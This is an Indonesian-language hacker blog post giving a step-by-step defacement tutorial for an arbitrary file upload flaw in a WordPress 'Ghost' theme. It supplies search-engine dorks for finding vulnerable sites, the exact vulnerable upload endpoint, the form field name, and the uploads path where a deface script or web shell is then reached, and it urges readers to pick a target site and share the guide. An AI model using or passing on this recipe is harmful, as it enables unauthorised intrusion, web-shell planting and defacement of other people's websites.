Wordpress Ghost Theme Arbitary File Upload


Hallo jingan kembali lagi bersama saya Mine7
oke di postingan saya kali ini saya akan memberikan tutorial cara defac metode Wordpress Ghost Theme Arbitary File Upload

oke ngga usah banyak cing cong langsung aja ke tutorial nya

bahan"

Dork : inurl:wp-content/themes/Ghost/
index of wp-content/themes/Ghost/
xploit : /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
csrf online : touch me
post file : Filedata

oke seperti biasa pertama kalian dorking dulu pake dork diatas


jika sudah kalian pilih salah satu website


lalu kalian masukan xploit nya

maka tampilanya akan seperti ini


jika muncul notice seperti ini {"status":"NOK", "ERR":"This file is incorect"} kemungkinan besar webnya vuln

oke langsung saja ke csrf

target kalian isi dengan target kalian
postfile kalian isi Filedata

contoh


nah jika sudah kalian klik kunci target

lalu kalian upload script deface/shell kalian

jika berhasil maka akan seperti ini


cara akses nya?

http://xxx.com/wp-content/uploads/settingsimages/namascriptdefcekalian

dan boom


oke mungkin itu saja tutorial singkat dari saya jika kurang paham silahkan comment di bawah

jangan lupa share ke temen temen kalian



see you next post
Mine7
Mine7 keep respect and happy hacking

No comments for "Wordpress Ghost Theme Arbitary File Upload "